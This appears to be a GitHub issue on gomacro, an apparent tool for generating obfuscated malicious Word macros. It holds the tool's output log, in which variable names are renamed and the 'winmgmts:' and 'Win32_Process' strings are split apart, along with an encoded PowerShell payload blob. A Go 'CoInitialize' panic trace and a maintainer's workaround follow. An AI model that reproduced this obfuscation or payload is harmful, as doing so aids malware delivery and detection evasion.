### ISSUE TITLE
panic: CoInitialize has not been called.

### ISSUE THREAD

**Issue by Phuong39** [oXis/gomacro#3]
```
Function Name: EntryPoint
Var name: part1
Var name: part2
str: "winmgmts:"
str: "Win32_Process"
Function Name: Ssplit
Function Name: Decode
Function Name: Format
Parameter name: str
Parameter name: arrayofWords
Var name: sep
Var name: ret
Var name: offset
Var name: counter
Var name: counter
Var name: temporary
Var name: counter
Replacing EntryPoint with grindelia
Replacing part2 with landholder
Replacing part1 with orchidoplasty
Replacing "winmgmts:" with Format("{0}{2}{1}", "win",":","mgmts")
Replacing "Win32_Process" with Format("{0}{3}{2}{1}", "Wi","s","roces","n32_P")
Replacing Decode with bramble
Replacing Format with paperboard
Replacing Ssplit with rebeset
Replacing str with decorum
Replacing arrayofWords with consigneeship
Replacing sep with quarterstaff
Replacing ret with familiar
Replacing offset with pileus
Replacing counter with precorrespondence
Replacing temporary with stabilitate
PSPayload text is 21jHx12jHx46jHx46jHx41jHx59jHx64jHx54jHx65jHx73jHx69jHx46jHx46jHx37jHx75jHx69jHx70jHx55jHx63jHx5jHx4jHx46jHx46jHx41jHx59jHx64jHx54jHx65jHx73jHx69jHx34jHx65jHx73jHx55jHx68jHx37jHx58jHx55jHx62jHx62jHx46jHx46jHx72jHx3jHx0jHx2jHx46jHx46jHx66jHx65jHx73jHx55jHx68jHx69jHx58jHx55jHx62jHx62jHx0jHx55jHx74jHx55jHx-14jHx-1jHx55jHx-14jHx21jHx57jHx20jHx25jHx19jHx25jHx10jHx19jHx53jHx57jHx20jHx24jHx19jHx25jHx23jHx19jHx43jHx73jHx20jHx65jHx19jHx21jHx19jHx19jHx29jHx19jHx19jHx61jHx19jHx25jHx73jHx19jHx51jHx35jHx20jHx71jHx19jHx25jHx39jHx19jHx27jHx19jHx20jHx66jHx19jHx25jHx6jHx19jHx27jHx19jHx19jHx61jHx19jHx21jHx57jHx19jHx29jHx19jHx20jHx33jHx19jHx25jHx39jHx19jHx54jHx73jHx19jHx70jHx19jHx23jHx10jHx19jHx43jHx57jHx20jHx67jHx19jHx25jHx39jHx19jHx43jHx73jHx20jHx2jHx19jHx21jHx19jHx19jHx38jHx57jHx20jHx62jHx19jHx26jHx35jHx19jHx30jHx57jHx20jHx42jHx19jHx25jHx39jHx19jHx43jHx57jHx20jHx22jHx19jHx25jHx73jHx19jHx51jHx35jHx20jHx62jHx19jHx25jHx6jHx19jHx54jHx19jHx19jHx66jHx19jHx21jHx6jHx19jHx36jHx19jHx20jHx72jHx19jHx26jHx53jHx19jHx52jHx57jHx20jHx69jHx19jHx25jHx10jHx19jHx43jHx35jHx20jHx61jHx19jHx24jHx31jHx19jHx54jHx19jHx20jHx75jHx19jHx25jHx61jHx19jHx52jHx57jHx20jHx64jHx19jHx21jHx57jHx19jHx28jHx73jHx20jHx31jHx19jHx23jHx61jHx19jHx38jHx57jHx20jHx30jHx19jHx21jHx53jHx19jHx29jHx35jHx19jHx57jHx19jHx21jHx2jHx19jHx53jHx73jHx20jHx73jHx19jHx25jHx73jHx19jHx51jHx35jHx20jHx2jHx19jHx21jHx19jHx19jHx27jHx57jHx20jHx53jHx19jHx25jHx6jHx19jHx27jHx57jHx19jHx66jHx19jHx21jHx61jHx19jHx21jHx57jHx20jHx9jHx19jHx19jHx65jHx19jHx27jHx19jHx19jHx57jHx19jHx21jHx19jHx19jHx27jHx19jHx20jHx52jHx19jHx24jHx31jHx19jHx55jHx35jHx20jHx76jHx19jHx26jHx35jHx19jHx44jHx35jHx20jHx70jHx19jHx21jHx6jHx19jHx40jHx19jHx20jHx62jHx19jHx26jHx57jHx19jHx54jHx19jHx19jHx71jHx19jHx23jHx39jHx19jHx52jHx57jHx20jHx60jHx19jHx25jHx10jHx19jHx44jHx19jHx20jHx66jHx19jHx25jHx6jHx19jHx44jHx73jHx20jHx54jHx19jHx22jHx65jHx19jHx33jHx57jHx20jHx40jHx19jHx24jHx35jHx19jHx36jHx57jHx19jHx6jHx19jHx21jHx6jHx19jHx36jHx73jHx20jHx62jHx19jHx26jHx35jHx19jHx39jHx73jHx20jHx2jHx19jHx26jHx27jHx19jHx51jHx35jHx20jHx71jHx19jHx25jHx53jHx19jHx29jHx19jHx20jHx52jHx19jHx24jHx31jHx19jHx55jHx35jHx20jHx76jHx19jHx26jHx35jHx19jHx44jHx35jHx20jHx70jHx19jHx21jHx6jHx19jHx35jHx73jHx20jHx72jHx19jHx25jHx6jHx19jHx54jHx57jHx20jHx62jHx19jHx26jHx27jHx19jHx54jHx19jHx20jHx54jHx19jHx22jHx65jHx19jHx33jHx57jHx20jHx25jHx19jHx26jHx27jHx19jHx52jHx73jHx20jHx70jHx19jHx23jHx27jHx19jHx43jHx35jHx20jHx76jHx19jHx25jHx39jHx19jHx32jHx57jHx19jHx2jHx19jHx24jHx31jHx19jHx54jHx19jHx20jHx75jHx19jHx25jHx61jHx19jHx52jHx57jHx20jHx64jHx19jHx21jHx57jHx19jHx28jHx19jHx20jHx69jHx19jHx25jHx61jHx19jHx52jHx57jHx20jHx62jHx19jHx21jHx61jHx19jHx29jHx35jHx19jHx57jHx19jHx26jHx73jHx19jHx27jHx19jHx20jHx28jHx19jHx23jHx39jHx19jHx41jHx19jHx19jHx29jHx19jHx26jHx2jHx19jHx21jHx57jHx20jHx60jHx19jHx25jHx23jHx19jHx43jHx73jHx20jHx58jHx19jHx26jHx19jHx19jHx53jHx57jHx20jHx72jHx19jHx26jHx39jHx19jHx54jHx19jHx19jHx29jHx19jHx23jHx43jHx19jHx52jHx73jHx20jHx75jHx19jHx23jHx39jHx19jHx43jHx35jHx20jHx60jHx19jHx25jHx57jHx19jHx27jHx19jHx19jHx65jHx19jHx21jHx35jHx19jHx52jHx19jHx20jHx66jHx19jHx25jHx6jHx19jHx44jHx35jHx19jHx57jHx19jHx25jHx61jHx19jHx52jHx57jHx19jHx57jHx19jHx21jHx35jHx19jHx29jHx19jHx19jHx65jHx19jHx23jHx6jHx19jHx44jHx35jHx20jHx5jHx19jHx21jHx2jHx19jHx38jHx73jHx20jHx59jHx19jHx25jHx65jHx19jHx44jHx35jHx20jHx60jHx19jHx26jHx35jHx19jHx27jHx19jHx20jHx33jHx19jHx25jHx39jHx19jHx54jHx19jHx19jHx71jHx19jHx24jHx53jHx19jHx44jHx35jHx20jHx59jHx19jHx23jHx31jHx19jHx52jHx19jHx20jHx66jHx19jHx25jHx39jHx19jHx52jHx57jHx20jHx2jHx19jHx21jHx61jHx19jHx30jHx57jHx20jHx23jHx19jHx25jHx10jHx19jHx54jHx73jHx20jHx71jHx19jHx25jHx73jHx19jHx52jHx73jHx20jHx58jHx19jHx25jHx35jHx19jHx39jHx73jHx20jHx2jHx19jHx26jHx27jHx19jHx51jHx35jHx20jHx71jHx19jHx25jHx53jHx19jHx29jHx19jHx19jHx64jHx19jHx23jHx73jHx19jHx37jHx35jHx20jHx33jHx19jHx23jHx69jHx19jHx28jHx73jHx19jHx66jHx19jHx21jHx19jHx19jHx30jHx35jHx20jHx76jHx19jHx26jHx19jHx19jHx52jHx19jHx20jHx66jHx19jHx26jHx35jHx19jHx27jHx19jHx19jHx59jHx19jHx24jHx73jHx19jHx52jHx57jHx19jHx59jHx19jHx21jHx61jHx19jHx29jHx35jHx19jHx29jHx19jHx26jHx69jHx19jHx21jHx57jHx19jHx57jHx19jHx21jHx19jHx19jHx27jHx19jHx19jHx57jHx19jHx24jHx69jHx19jHx39jHx73jHx20jHx7jHx19jHx26jHx31jHx19jHx54jHx19jHx20jHx62jHx19jHx25jHx2jHx19jHx30jHx57jHx20jHx39jHx19jHx25jHx39jHx19jHx55jHx19jHx20jHx2jHx19jHx21jHx6jHx19jHx36jHx35jHx20jHx71jHx19jHx25jHx31jHx19jHx52jHx73jHx20jHx61jHx19jHx25jHx61jHx19jHx52jHx57jHx20jHx64jHx19jHx24jHx2jHx19jHx33jHx57jHx19jHx8jHx19jHx24jHx39jHx19jHx40jHx19jHx20jHx25jHx19jHx22jHx57jHx19jHx30jHx57jHx20jHx26jHx19jHx25jHx39jHx19jHx54jHx19jHx20jHx38jHx19jHx26jHx35jHx19jHx53jHx57jHx20jHx66jHx19jHx25jHx6jHx19jHx44jHx73jHx19jHx65jHx19jHx24jHx69jHx19jHx39jHx73jHx20jHx7jHx19jHx26jHx31jHx19jHx54jHx19jHx20jHx62jHx19jHx25jHx2jHx19jHx30jHx57jHx20jHx22jHx19jHx25jHx10jHx19jHx52jHx57jHx20jHx4jHx19jHx25jHx39jHx19jHx53jHx57jHx20jHx2jHx19jHx24jHx2jHx19jHx33jHx57jHx19jHx8jHx19jHx23jHx43jHx19jHx53jHx57jHx20jHx72jHx19jHx25jHx2jHx19jHx35jHx57jHx20jHx58jHx19jHx26jHx31jHx19jHx44jHx35jHx19jHx4jHx19jHx22jHx35jHx19jHx39jHx73jHx20jHx2jHx19jHx26jHx27jHx19jHx51jHx35jHx20jHx71jHx19jHx25jHx53jHx19jHx29jHx19jHx19jHx61jHx19jHx25jHx73jHx19jHx51jHx35jHx20jHx71jHx19jHx25jHx39jHx19jHx29jHx35jHx19jHx66jHx19jHx21jHx19jHx19jHx56jHx19jHx19jHx57jHx19jHx23jHx61jHx19jHx36jHx35jHx20jHx43jHx19jHx19jHx65jHx19jHx56jHx35jHx19jHx29jHx19jHx21jHx39jHx19jHx27jHx35jHx19jHx65jHx19jHx23jHx39jHx19jHx41jHx19jHx20jHx39jHx19jHx24jHx27jHx19jHx35jHx35jHx19jHx57jHx19jHx26jHx31jHx19jHx54jHx19jHx20jHx75jHx19jHx25jHx61jHx19jHx52jHx57jHx20jHx64jHx19jHx22jHx2jHx19jHx38jHx19jHx20jHx28jHx19jHx23jHx6jHx19jHx37jHx73jHx19jHx69jHx19jHx21jHx19jHx19jHx53jHx73jHx20jHx2jHx19jHx26jHx27jHx19jHx51jHx35jHx20jHx71jHx19jHx25jHx53jHx19jHx34jHx35jHx20jHx31jHx19jHx23jHx61jHx19jHx38jHx57jHx20jHx30jHx19jHx21jHx61jHx19
panic: CoInitialize has not been called.

goroutine 1 [running]:
github.com/go-ole/go-ole/oleutil.MustCallMethod(0x1644, {0x71188a, 0x6a531b}, {0xc000089728, 0x0, 0x0})
	D:/go/src/github.com/go-ole/go-ole/oleutil/oleutil.go:58 +0x5e
github.com/oxis/gomacro/pkg/gomacro.(*Form).Add(0xc00002a480, {0x90ffee, 0x69c8ca}, {0x78300d, 0x8})
	D:/go/src/github.com/oxis/gomacro/pkg/gomacro/form.go:42 +0xbc
main.addTextBox(0x0, {0x78300d, 0x8}, {0xc00092d000, 0x1631}, 0xc00002a480)
	D:/gomacro/cmd/main/main.go:23 +0x76
main.setupForm(0x6fa3a0, 0xc000089cf0, 0x719076, {0xc00059b900, 0x4b7})
	D:/gomacro/cmd/main/main.go:60 +0x3f4
main.main()
	D:/gomacro/cmd/main/main.go:180 +0xbef
```

**Comment by oXis** [comment]
I know... this bug is driving me crazy, I have no idea how to fix it. It maybe is a go-ole bug.
The solution is just to kill `WORD.exe` process and start again.
